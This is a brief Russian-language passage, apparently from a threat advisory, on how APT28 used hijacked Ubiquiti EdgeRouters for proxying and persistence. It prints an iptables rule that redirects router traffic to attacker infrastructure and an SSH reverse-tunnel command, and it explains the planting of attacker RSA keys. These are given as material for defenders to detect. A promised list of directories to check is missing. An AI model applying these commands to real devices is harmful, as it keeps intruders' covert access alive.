Прокси и туннель. Неофициальные функции Ubiquiti
Прокси-сервер и туннельная инфраструктура
APT28 использовали скомпрометированные Ubiquiti EdgeRouters для установления прокси-соединений и SSH-туннелей к подконтрольной инфраструктуре для поддержания постоянного доступа и контроля над скомпрометированными устройствами даже после смены пароля или других попыток взлома.
Были использованы правила iptables в EdgeRouters для установления подключений, например:
iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>:10081
Это правило iptables перенаправляет входящий трафик через порт 4443 EdgeRouter в выделенную инфраструктуру на порту 10081.
Кроме того, APT28 загрузили контролируемые SSH-RSA-ключи на скомпрометированные EdgeRouters для создания SSH-туннелей. Эти туннели позволяют получать доступ к скомпрометированным устройствам даже после смены пароля или других попыток взлома.
Следующие каталоги необходимо просмотреть на предмет неизвестных ключей RSA:
Наличие неизвестных ключей RSA в этих каталогах может указывать на то, что их использовали для доступа к EdgeRouters в обход аутентификации по паролю.
Кроме того, безопасники могут проверить журналы сетевого трафика на EdgeRouters для идентификации аномальные сеансы SSH:
ssh –i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>
Эта команда устанавливает SSH-туннель от EdgeRouter к инфраструктуре, позволяя поддерживать удалённый доступ и контроль над скомпрометированным устройством.